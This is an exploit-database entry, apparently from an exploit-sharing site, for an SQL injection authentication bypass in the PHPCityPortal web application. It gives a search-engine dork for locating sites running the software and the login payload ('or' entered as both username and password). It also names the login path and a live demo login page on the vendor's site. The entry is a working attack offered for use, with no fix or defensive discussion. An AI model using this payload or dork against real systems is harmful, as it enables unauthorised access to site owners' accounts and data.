id: 5631
date: 08/06/2009
title: PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability
author: CoBRa_21
cves: 

==============================================================
PHPCityPortal (Auth Bypass) Remote SQL Injection Vulnerability
==============================================================


******************************************************************************************
Script Name: PHPCityPortal (Auth Bypass) SQL Injection Vulnerability
 
Author:   CoBRa_21
 
Script Page:  http://phpcityportal.com/
 
DOrk:    intext:"Powered by PHPCityPortal.com"
 
******************************************************************************************
EXPLOIT
 
Username: 'or'
 
Password: 'or'
 
http://localhost/[path]/login.php
 
Demo: http://phpcityportal.com/demo/login.php
 
******************************************************************************************




#  0day.today [2023-03-24]  #